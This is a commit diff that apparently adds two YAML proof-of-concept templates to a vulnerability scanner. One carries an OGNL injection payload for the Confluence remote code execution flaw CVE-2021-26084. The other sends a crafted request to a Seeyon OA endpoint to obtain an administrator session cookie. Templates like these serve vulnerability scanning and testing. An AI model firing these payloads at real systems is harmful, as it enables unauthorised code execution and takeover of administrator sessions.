更新指纹、优化内存占用

This commit is contained in:
影舞者
2021-09-10 20:32:51 +08:00
parent 2e452a9695
commit d5665f03d6
20 changed files with 265 additions and 48 deletions
+17
View File
@@ -0,0 +1,17 @@
name: poc-yaml-atlassian-confluence-rce
set:
rand1: randomInt(1000, 9999)
rand2: randomInt(400, 9999)
rules:
- method: POST
path: "/pages/createpage-entervariables.action"
follow_redirects: true
body: |
queryString=alt3kx\u0027%2b#{{{rand1}}*{{rand2}}}%2b\u0027
expression: |
response.status == 200 && response.body.bcontains(bytes(string(rand1 * rand2)))
detail:
author: tangshoupu
info: Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
links:
- https://mp.weixin.qq.com/s/lVCT6JAA_BU9h4ISLlMNbQ
+16
View File
@@ -0,0 +1,16 @@
name: poc-yaml-seeyon-oa-cookie-leak
rules:
- method: POST
path: /seeyon/thirdpartyController.do
body: |
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
expression: |
response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"/seeyon/common/")
- method: GET
path: /seeyon/main.do?method=headerjs
expression: |
response.status == 200 && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"id\":\"-7273032013234748168\"")
detail:
author: Print1n(http://print1n.top)
links:
- https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg